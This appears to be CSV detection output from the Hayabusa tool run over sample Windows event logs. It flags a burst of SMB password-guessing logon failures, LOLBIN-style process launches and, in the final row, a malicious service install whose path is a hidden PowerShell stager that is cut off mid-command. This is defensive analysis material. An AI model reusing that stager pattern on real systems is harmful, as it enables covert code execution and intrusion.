AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.317 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.495 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.537 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.741 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.781 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.864 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.917 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.997 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.034 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.069 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.114 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.231 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.275 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.485 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.535 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.572 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.670 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.713 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:48.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.266 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:49.399 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:54:20.381 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:20.959 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:20.959 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:20.959 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:22.866 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:54:22.866 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:55:28.022 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:55:39.187 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:00:27.606 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.282 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.712 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.712 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.834 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.834 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.017 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.017 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.106 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.106 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.183 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.183 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.891 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.912 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 18:12:12.619 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 19:12:55.622 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:04:48.639 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.147 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 